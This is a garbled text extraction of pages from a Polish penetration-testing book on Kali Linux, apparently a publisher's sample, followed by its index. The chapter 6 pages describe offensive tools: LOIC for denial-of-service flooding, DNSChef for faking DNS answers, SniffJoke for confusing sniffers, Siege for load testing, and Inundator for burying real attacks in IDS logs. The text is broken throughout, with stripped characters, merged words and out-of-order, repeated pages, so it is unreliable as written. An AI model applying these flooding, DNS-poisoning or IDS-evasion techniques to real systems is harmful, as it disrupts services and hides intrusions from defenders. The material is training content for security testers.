siege [opcje] ltadres URL celugt

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

269

Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-

nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku

InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

270

wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS

TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych

Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci

PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce

W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia

W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew

Kup książkę Poleć książkę

Skorowidz

Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275

harmonogram 276zabezpiecze systemu 276

ALE 31analiza

bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych

zawieraj cychoprogramowanie firmware298

ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat

299zawarto ci plikoacutew PDF 299

da HTTP 203aplet Java 156aplikacje internetowe 23

b dy w zabezpieczeniach286

wykrywanie i mapowanie 241zakres testoacutew penetracyjnych

23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212

ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki

brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji

internetowych 147na parametry metod GET

i POST 131na protoko y komunikacyjne

256na serwery aplikacji

internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie

zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151

amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257

wykorzystuj ce przeci eniepo cze sieciowych 256

XSS 223 248z klonowaniem 151z u yciem narz dzi

penetracyjnych opartychna przegl darkach 236

audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301

Authentication hijacking 225Autopsy 295AV 31

BBackTrack 38badanie zasoboacutew sieci

komputerowych 65bazy danych 218BeEF 232

panel zarz dzania pakietu 234przechwycony system 235

bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272

a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania

i urz dze 274podstawowe wymogi 273

bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych

288 291narz dzia 293partycje 292suma kontrolna 294

Kup książkę Poleć książkę

Skorowidz

330

black-box 24 30BootKey 171 173Browser Exploitation

Framework 232brute-force 125 170

amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238

Intercept 241opcje konfiguracyjne 239

Burp Spider 241 244Burp Suite 238

Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty

CEH 311CISSP 31 193g oacutewnego urz du certyfikacji

106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282

chkrootkit 295chntpw 180

uruchomienie w Kali Linux182

ciasteczka 197edytowanie zawarto ci 199

201niezabezpieczone 208obrona przed

przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200

ci g zaburzaj cy 170Cisco Network Foundation

Protection 275CISSP 193Clickjacking 196

kod roacuted owy stron 197obrona przed atakiem 287

CmosPwd 190

Cookie Cadger 203dane o sesji 204

Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185

znaki specjalne 186CutyCapt 327czarne pude ko 24

DDBPwAudit 229dc3dd 293 297dd 291DDoS 256

kategorie atakoacutew 256obrona przed atakiem 285

Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128

raport 130Distributed Denial of Service

256DNS 267DNSChef 266dokumentacja 306DoS 256

kategorie atakoacutew 256obrona przed atakiem 285

dost p do systemualternatywny 37techniki XSS 225

dost pno 30Dradis 325Driftnet 217dsniff 212

nas uchiwaniei przechwytywaniepakietoacutew 213

uruchamianie 214dual-boot configuration 44

EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate

Authority 282Ettercap 214

lista celoacutew 216skanowanie sieci 216

Exploitation Tools 36 37 48exploity 92 113

Reserve_TCP Meterpreter156

Ffa szywe

adresy IP 285odpowiedzi DNS 267witryny 159 252

Ferret 209uruchamianie 210

FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84

utworzenie nowego projektu84

Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170

kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93

Ggenerator

hase 278adunkoacutew 132

GHDB 63GIT 250glosariusz 319

Kup książkę Poleć książkę

Skorowidz

331

Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246

instancja projektu 225

HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137

dost pu 250generowanie listy 185amanie 169

ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169

249si a 277w systemie Linux 173w systemie Windows 171

haszowanie 170z dodatkiem soli

kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125

uruchomienie 128

IICMP Echo Request 70identyfikacja

adresoacutew URL 227celoacutew za pomoc serweroacutew

DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci

188

iFrame 196Information Gathering 34 46informatyka ledcza 287

zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria

spo eczna 148wsteczna 48

ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142

Jj zyk SQL 218John the Ripper 137 173

domy lna konfiguracjacie ek 176

haszowanie 170amanie hase 174

proces 137amanie pliku hase 139

s owniki 138 177szybko dzia ania 138

Johnny 138amanie hase 174

opcje konfiguracyjneprogramu 175

s owniki 177uruchamianie 175

KKali Linux 15

aktualizacja pakietu SET 150instalowanie 40

pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania

sprz towe 40narz dzia dost pne

w systemie 46Network Install 40proces konfigurowania

partycji dysku 42publiczny adres IP 225s owniki 129

uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39

wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147

aplikacji internetowych 169191

HTTP 262klonowanie

rodowiska 278witryny internetowej 66 153

158 251 279klucze uruchamiania systemu

171 173komunikaty

ICMP 70o up ywie czasu dania 70

kopiowanie plikoacutew SAMi SYSTEM z hosta 172

LLinux amanie hase 173lista

adresoacutew URL 227potencjalnych hase 185

listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263

tryby 266luki w zabezpieczeniach

aktualizacja bazy 276aplikacji internetowych 245

254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty

elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92

LVM 43

Kup książkę Poleć książkę

Skorowidz

332

adunek 117amanie hase 137 169

bezp atne us ugi sieciowe190

haszowanych 189maska 189narz dzia 174przechowywanych w plikach

systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper

174zabezpieczaj cych BIOS

komputera 190cza modyfikacja 196

MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74

zadania 76Maltego CaseFile 326man-in-the-middle 139 211

obrona przed atakiem 281przeprowadzanie manualne

212maska 189mechanizmy

HSTS 140klonowania 153obronne 231 271

testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego

po czenia SSL 257usuwania mi kkich b doacutew

404 93mened er LVM 43metadane 83

wyszukiwanie i analiza 83Metasploit 113 154

skanowanie sieci lokalnej 114wersja konsolowa 114

meterpreter 151uruchomienie sesji 156wykorzystanie 156

metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24

310 323metody

pojedynczegouwierzytelniania 194

szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem

Windows 172

Nnag oacutewki X-Frame-Options 287narz dzia

do klonowania witryn 281do amania hase 174do przechwytywania sesji

198do przeprowadzania atakoacutew

DoSDDoS 285ledcze 295

wspomagaj ce tworzenieraportoacutew 325

nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228

nazwy DNS 71Nessus 162

HomeFeed 163instalowanie w systemie

Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164

Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe

263Nmap 76

agresywne skanowanie 79graficzny interfejs

u ytkownika 77okno wynikoacutew skanowania 82opcje 79

NoScript 287no niki danych 288

Oobrona przed atakami

Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek

286SSLstrip 284

ocena ryzyka 30formu y 31okna serwisowe 277

ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183

uruchomienie w Kali Linux184

osobista weryfikacja to samo ci194

oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu

poufno ci 307otwarta implementacja sterownikoacutew

kart graficznych 178Owasp-Zap 105 245

automatyczne logowanie 110konfigurowanie przegl darki

108mechanizm aktualizacji ca ego

pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111

PPAE 39pakiety

ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259

pami masowa urz dze 289partycje 172

wymiany 291Pasco 299Password Attacks 37 47 174Patator 229

Kup książkę Poleć książkę

Skorowidz

333

pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki

binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180

wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie

299poczta elektroniczna 123

fa szywe wiadomo ci 159podatno na atak 29

aktualizacja bazy 276aplikacji internetowych 245

254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226

podnoszenie uprawnie 37podstawowe wymogi

bezpiecze stwa 303podsumowanie ustale 313polecenia

apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70

getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116

polityka zarz dzania has ami 277po czenia

HTTP 268HTTPS 268

po czeniaTCP 267troacutejetapowe 79VPN 282

poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276

porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142

poufno 30poziom zabezpiecze

minimalny 274podstawowy 274

PREROUTING 143

Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty

Emily 59Gruyere 224 246

promiscuous mode 47Protocol Attacks 256protoko y

8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281

ProxyStrike 98robot sieciowy 100

przechwytywanieciasteczek 197 209 286danych logowania

u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych

w sieci 217pakietoacutew 213

sieciowych 210TCP 259

przechwytywaniepo cze 161

TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267

270sesji 197 208 233

narz dzia 198przegl d projektu 306przegl darki 232

ochrona przed atakami 236zabezpieczenia 249

przekazywanie pakietoacutew IP 142212

przekierowaniepo cze 284portoacutew komunikacyjnych

142ruchu sieciowego 141sesji 284

przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173

Kup książkę Poleć książkę

Skorowidz

334

RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy

b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce

tworzenie 325o wiadczenie o zachowaniu

poufno ci 307podatno ci i luki

w zabezpieczeniach 315podsumowanie ustale 313

zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury

testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje

dla rodowiska sieciowego316

wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami

dokumentacji 308zgodno ze standardami

i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316

powykonawcze 28rekonesans 34 51

badanie zasoboacutew siecikomputerowych 65

Google hacking 61

Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy

adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u

ICMP 69z wykorzystaniem serweroacutew

DNS 71zadania 52zasoby serwisoacutew

spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54

rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia

zdarzenia 31rootkit 295rozsy anie spreparowanych

pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206

adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285

SSAM 171samdump2 178Scalpel 299

Scapy 257 259scenariusze atakoacutew 260

security assessment 21security audit 21serwery 91

aplikacji internetowych 92223zabezpieczanie 136 249

atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236

wykorzystanie 238Samba 116sieciowe 91WWW 262

serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71

serwisy spo eczno ciowe 58sesja 195

ciasteczka 197logowania 205mechanizmy bezpiecze stwa

195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249

adres IP sklonowanej witryny158

aplet Java 156Credential Harvester Attacks

157Exploit to deliver 154importowanie w asnych

plikoacutew witrynyinternetowej 158

IP addresshostname forreverse connection 154

mechanizmy chroni ceprzeprowadzany atak 155

NATPort forwarding 154przechwycenie nazw kont

i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych

wiadomo ci 159URL you want to clone 154

Kup książkę Poleć książkę

Skorowidz

335

uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku

z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery

biometryczne 194stron internetowych 246

skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u

ICMP 70Skipfish 95

raport 97s owniki 96

skryptyopakowuj ce 228wykrywanie

nieautoryzowanychskryptoacutew 287

XSS 224 226SLE 31Slowloris 261s owa kluczowe

dbs 222FUZZ 133 135tables 222

sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata

31sqlmap 221SSL stripping 140SSLstrip 140 197 211

konfigurowanieprzekierowania portoacutew 142

mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141

SSO 194

standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293

baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy

BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia

i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231

szablony witryn 251szare pude ko 24szyfrowane po czenia

https 197VPN 282

Ttablice t czowe 170 189

amanie hase systemuWindows 183

Tamper Data 125TCPReplay 270Tenable 163testowanie

dzia ania roacute nych urz dzesieciowych 270

mechanizmoacutew obronnych 273odporno ci na przeci enia

268podatno ci na ataki XSS 224sklonowanego rodowiska

279testy

o nieograniczonym zakresiedzia ania 26

odporno ci na przeci eniesystemu 256

warunkoacutew skrajnych 256

testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu

zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu

Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33

THX-SSL-DOS 257tokeny 194

sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259

Uumowy

oczekiwania klienta 317potencjalne problemy

i zagadnienia 324rozliczane wed ug zu ycia

czasu i zasoboacutew 305wykaz prac 319ze sta cen 304

unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi

NAT 251profesjonalne 304w chmurze 211

usuwanie ladoacutew w amania 38utrzymanie zdobytego

przyczoacute ka 37uwierzytelnianie 193

ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193

Kup książkę Poleć książkę

Skorowidz

336

VVega 101

modu serwera proxy 104zestawienie znalezionych

podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32

Ww3af 120

wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122

w3mir 281warto

ryzyka 32sumy kontrolnej 293zasobu 31

WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92

obs uga programu 93raport 95

WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132

Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171

ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie

plikoacutew 172partycja systemu 172uzyskanie dost pu do

systemu 180Windows Reverse_TCP

Meterpreter 154Wireless Attacks 47Wireshark 206

filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie

ciasteczek 198kodu 248

kodu SQL 218pakietoacutew 228skryptoacutew 223

wtyczki przegl darki Firefox 198wykaz prac

dodatkowe elementy 323dodatkowe uzgodnienia

prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania

i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy

penetracyjne 321wykorzystywanie

b doacutew w zabezpieczeniachprzegl darki 196

exploitoacutew 92luk w zabezpieczeniach 113

254systemoacutew poczty

elektronicznej 123zidentyfikowanych

podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie

luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92

wytyczne 28 304

XXSS 223

aplikacje internetowe 248testowanie podatno ci 224

XSS cookie stealing 225

Zzabezpieczanie

serweroacutew aplikacjiinternetowych 249

systemoacutew pod czonychdo internetu 271

zakres prac 319cel testu 33definicja

przestrzeni celoacutew 27systemoacutew 26

zdobycia flagi 28dokument 25identyfikacja obszaroacutew

krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o

planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby

prze amywaniazabezpiecze 27

rekomendacjepowykonawcze 28

specyfikacja raportuko cowego 28

ZAP 236 245obrona przed zdalnymi

atakami 249Zaproxy 105zarz dzanie

aktualizacjami 275poprawkami zabezpiecze

275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308

zasoby sieciowe odpornona przeci enie 263

zatarcie ladoacutew penetracji systemu38

zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125

Host details 81Zero-day 275zewn trzny dysk USB 292zmienne

LHOST 118RHOST 117

znaczniki czasu 172zrzut okna 327

daniaForm 131mapowanie 24

Kup książkę Poleć książkę

Page 42: Tytuł oryginału: Web Penetration Testing with Kali Linuxpdf.helion.pl/kalili/kalili.pdf · Uruchamianie systemu Kali Linux z no nika zewnÚtrznego 39 Instalowanie systemu Kali Linux

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

265

Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej

loicsh install

Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie

loicsh update

Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie

loicsh run

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

266

U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny

Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP

Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding

Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane

DNSChef

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

267

Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne

Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera

SniffJoke

SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

268

SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force

Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)

Sk adnia wywo ania polecenia siege jest nast puj ca

siege [opcje] ltadres URL celugt

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

269

Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-

nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku

InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

270

wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS

